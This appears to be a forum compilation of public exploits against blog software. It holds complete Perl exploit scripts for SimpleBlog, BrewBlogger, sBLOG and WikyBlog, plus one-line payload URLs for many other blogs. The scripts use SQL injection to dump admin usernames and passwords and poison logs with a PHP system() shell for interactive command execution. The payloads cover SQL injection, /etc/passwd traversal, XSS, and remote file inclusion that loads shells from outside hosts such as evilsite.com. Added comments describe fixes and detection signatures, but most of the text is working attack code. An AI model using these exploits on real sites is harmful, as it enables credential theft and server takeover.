SimpleBlog 3.0 SQL Injection
PHP код:
#!/usr/bin/perl
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# SimpleBlog 3.0 [ comments_get.asp ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by MurderSkillz #
# #
# shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox, #
# Canuck, a59, sess, bernard, + the rest of g00ns #
# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
use LWP::UserAgent;
# First command-line argument is the target host (optionally with a path).
# `@ARGV[0]` is a one-element array slice rather than the scalar `$ARGV[0]`;
# it still yields the first argument, but `$ARGV[0]` is the conventional form.
$host = @ARGV[0];
$ua = LWP::UserAgent->new;
# UNION-based SQL injection payload for the `id` parameter of comments_get.asp.
# The negative id is presumably chosen so that no real row matches and the
# UNIONed row (uUSERNAME / uPASSWORD from T_USERS) is what the page renders.
# Defensive note: the application uses `id` unparameterised; a bound/typed
# query parameter removes the issue, and the literal `union%20all%20select`
# sequence in request logs is a straightforward detection signature.
my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';
# Dispatch: no arguments -> banner + usage; a scheme prefix in the host is
# rejected (the script prepends http:// itself); otherwise run the request.
# `&top( )` style calls bypass prototypes; plain `top()` is the modern form.
if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &xpl( ) }
# Requests the injected URL and scrapes two fragments out of the response body:
# the first <strong>...</strong> text (printed as the admin user) and the text
# of the first <a href="http://..." target="_blank"> link (printed as the admin
# password). Reads the file-level globals $ua, $host and $inject; writes to
# STDOUT; exits 0 when the second pattern does not match. No return value is
# used by callers.
sub xpl( ) {
&top( );
print "\n [~] Connecting\n";
# Single unauthenticated GET. The HTTP status is not checked, so an error page
# body is scraped just like a 200 response.
$res = $ua->get("http://$host/$inject");
$con = $res->content;
print "\n [~] Checking for admin info\n";
# Bounded capture of 1-15 chars from [-_+.\w]. With /g in scalar context the
# match also advances pos($con), so the second match starts after this one.
if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi)
{
print "\n\t [+] Admin user: $1\n";
}
# Greedy (.*) captures; only $2 (the link text) is reported. If this pattern
# fails the script reports failure even when a user was printed above.
if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi)
{
print "\n\t [+] Admin password: $2\n";
print "\n [+] Complete\n";
}
else {
print "\n [-] Unable to retrieve admin info\n";
exit(0);
}
}
# Prints the banner. The q{...} literal spans the following lines, so the
# `#` lines inside it are string content, not comments.
sub top( )
{
print q {
##################################################################
# SimpleBlog 3.0 [ comments_get.asp ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by MurderSkillz #
##################################################################
}
}
# Prints usage text and terminates the process with status 0.
sub usage( )
{
print "\n Usage: perl simpleblog3.pl <host>\n";
print "\n Example: perl simpleblog3.pl www.example.com/path\n\n";
exit(0);
}
# milw0rm.com [2007-07-28]
BlogSite Professional SQL Injection
Код:
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*
6ALBlog SQL Injection
Код:
http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,concat(user,0x3a,pass),3,4,5,6,7%20from%20blog_users/*
BlogMe 3.0 SQL Injection
Код:
/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin
Archangel Weblog 0.90.02 Local File Inclusion
Код:
http://Target.com/blog/index.php?index=../../../../etc/passwd%00
sBLOG 0.7.3 Beta Local File Inclusion
PHP код:
#!/usr/bin/perl
# sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
# D.Script: http://sourceforge.net/projects/sblog/
# V.Code:
# if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php'))
# require('lang/' . $conf_lang_default . '.php');
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx : w4ck1ng.com & cyb3rt & 020
use IO::Socket;
use LWP::Simple;
#ripped
# Candidate relative paths to Apache access/error log files. The third
# command-line argument selects one entry (see `$apache[$apachepath]` below)
# to be used as the traversal value for the vulnerable include.
# Defensive note: this technique only works where the web-server log files are
# readable by the PHP process and reachable via `../` from the include's base
# directory. Keeping logs unreadable to the web-server user (or outside any
# path the application can reach) removes the log-poisoning vector entirely.
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
# Argument check: host, path and log selector are all required. The usage
# banner is one multi-line double-quoted string; its `#` lines are text.
if (@ARGV < 3) {
print "
===============================================================
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit #
# Gold.pl [Victim] / (apachepath) #
# Ex: Gold.pl [Victim] / ../logs/error.log #
===============================================================
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group #
# Thanx : w4ck1ng.com & cyb3rt & 020 #
===============================================================
";
exit();
}
# Positional arguments: target host, base path on that host, and the selector
# applied to @apache below (it is used as an array index in `$apache[...]`).
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
# Log-poisoning stage: a PHP snippet calling system() is placed in both the
# request line and the User-Agent header so that whichever of the access or
# error log the server writes will contain it verbatim.
# Detection: any `<?php` text in the request-URI or User-Agent field of a web
# server access log is a high-confidence indicator of this stage.
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
# Raw TCP to a hard-coded port 80 (no TLS, no proxy). `or die` is correct here:
# low-precedence `or` binds to the whole constructor call.
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
# Interactive loop. $cmd keeps its trailing newline (no chomp) and is
# interpolated unencoded into the query string below.
print "[shell] ";$cmd = <STDIN>;
# "END" is used as a pattern, not compared with `eq`, so any input containing
# END (e.g. "SEND") also terminates the loop.
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
# Inclusion stage: conf_lang_default is pointed at the selected log path via
# directory traversal, and the trailing %00 is meant to truncate the '.php'
# suffix the application appends (see the vulnerable code quoted in the header).
# The command is passed as the `cmd` query parameter.
# Defensive note: null-byte path truncation was closed in PHP 5.3.4 (paths
# containing NUL are rejected); the application-level fix is to validate
# conf_lang_default against an allow-list of language names before building
# the include path. Requests whose query string contains `../` and `%00` are
# the detection signature for this stage.
print $socket "GET ".$path."/inc/lang.php?conf_lang_default=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
# Echo the raw HTTP response, headers included, line by line.
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}
# milw0rm.com [2007-03-29]
WBBlog (XSS/SQL)
Код:
index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*
index.php?cmd=viewentry&e_id="><script>alert('Anti chat')</script>
WebLog File Disclosure
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php <<< username&password(md5)
BP Blog 7.0 SQL Injection
Код:
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Админка:
b2 Blog <= 0.5 Remote File Include
Код:
http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?
BLOG:CMS <= 4.1.3 Remote Inclusion
Код:
http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin
WikyBlog 1.3.2 Local File Inclusion
PHP код:
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
# Software: WikyBlog 1.3 #
# #
# Vendor: http://www.wikyblog.com/ #
# #
# Released: 2006/12/01 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for WikyBlog administrator #
# testing purposes only! #
# #
# This exploit makes use of a local file inclusion exploit in #
# WikyBlog to allow command execution. Firstly it locates an #
# access_log, or error_log then it inserts a PHP Shell into #
# the log file and returns a link for command execution. #
# #
# include/WBmap.php?l=file_to_include%00 #
# register_globals being on does not affect this vulnerability #
#################################################################################################
use IO::Socket;
use Switch;
# Connection parameters. `@ARGV[n]` is a one-element slice rather than the
# scalar `$ARGV[n]`; it still yields the argument, but the scalar form is the
# conventional one.
$port = "80"; # connection port (hard-coded, plain HTTP only)
$target = @ARGV[0]; # target host, e.g. localhost
$folder = @ARGV[1]; # application folder on the host, e.g. /wikyblog/
# Prints the banner. The q{...} literal spans the following lines, so the
# `#` lines inside it are string content, not comments.
sub Header()
{
print q {#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
};
}
# Prints usage text and terminates the process (exit status 0).
sub Usage()
{
print q {Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
};
exit();
}
# Banner, then argument check. The truthiness test means a missing argument
# and the literal values "0" or "" are all treated as absent.
Header();
if (!$target || !$folder) {
Usage(); }
# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
# Candidate relative paths to Apache access/error log files; each one is tried
# in turn as the traversal value for the vulnerable include (see the loop
# below). Defensive note: this only succeeds where the log files are readable
# by the PHP process and reachable via `../` from the include's base directory,
# so restrictive log permissions (or logs outside any application-reachable
# path) close the vector independently of the application bug.
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
# Stage 1: probe each candidate path through include/WBmap.php?l=... and treat
# a path as the log file when the response contains text bracketed by
# `_exppl_` markers (a convention carried over from the referenced script).
# Detection: a burst of requests to include/WBmap.php whose `l` parameter
# contains `../` sequences and `%00` is the signature of this stage.
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
# One connection per probe. `||` binds to the parenthesised constructor call,
# so the die check is effective here.
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
# Request lines end in bare "\n" rather than CRLF; many servers tolerate it.
print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
# Spoofed crawler User-Agent; log reviewers should not treat it as trusted.
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
#locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
# Collect the whole response (headers and body) before matching.
$out = "";
while ($answer = <$sock>) {
$out.=$answer; }
close($sock);
# /s lets (.*?) span newlines. The loop does not `last` on a hit, so the
# last matching path is the one kept in $log.
if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
print "[+] Log file found! [".$path."] \n";
$log = $path; }
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
# Stage 2: send a request whose path is a PHP snippet so the web server writes
# it into the log, then print the inclusion URL for that log.
# Detection: `<?php` in the request-URI field of an access log is a
# high-confidence indicator of log poisoning.
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";
# No trailing newline on the final status line.
print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";
# milw0rm.com [2006-12-01]
SimpleBlog <= 2.3 SQL Injection
Код:
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
BrewBlogger 1.3.1 SQL Injection
PHP код:
#!/usr/bin/perl
###########################################################################################
#Target:
#
# BrewBlogger 1.3.1
# http://brewblogger.zkdigital.com
#
#Vulnerability:
#
# SQL Injection
#
#Description:
#
# BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
# Since each user entry contains an auto-incrementing ID number, it is possible to
# enumerate all user names and passwords stored in the 'users' database by iterating
# through every possible ID number.
#
#Vulnerable Code (truncated):
#
# $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
# $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
# $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
# This script will produce a URL which will reveal the user name and password for
# the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
# the first user). The user name will be listed as "Method:" under 'General
# Information', and the password will be listed as "Cost:".
#
#Usage:
# ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
# ./brewblogger.pl www.beerblog.com 3
# ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
# intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
# Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
###########################################################################################
# Banner; a single-quoted literal, so the `#` lines are string content.
print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
# #
# Discovered and coded by: Craig Heffner #
###########################################
';
# No first argument (or "-h"): print usage and exit.
if(!$ARGV[0] || $ARGV[0] eq "-h"){
print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
exit;
}
# Optional second argument is the row id to select; default 2 (see header).
# A literal "0" is also treated as absent because of the truthiness test.
if(!$ARGV[1]){
$id = 2;
} else {
$id = $ARGV[1];
}
# Builds `id=0 UNION SELECT` with 210 columns, presumably to match the column
# count of the `SELECT *` on the brewing table; user_name is placed in column 8
# and password in column 9, which the header says the page renders as
# "Method:" and "Cost:".
# Defensive note: the vulnerable sprintf (header) uses %s with an unquoted
# value, so addslashes() cannot help — casting to int, using %d, or a prepared
# statement is the fix. `UNION+SELECT` followed by a long run of `1,` in the
# id parameter is the detection signature.
$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
# NOTE: `$a` is Perl's special sort variable; it works as a counter here but
# would clash with any sort {} block in scope. `$string` is never initialised
# before `.=`, which is silent only because the script lacks `use warnings`.
$a = 1;
while($a < 211){
if($a == 8){
$string .= "user_name,";
} elsif($a == 9){
$string .= "password,";
} elsif($a == 210){
$string .= "1";
} else {
$string .= "1,";
}
$a++;
}
print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;
# milw0rm.com [2006-11-10]
IrayoBlog 0.2.4 Remote File Include
Код:
http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?
vBlog / C12 0.1 Remote File Include
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?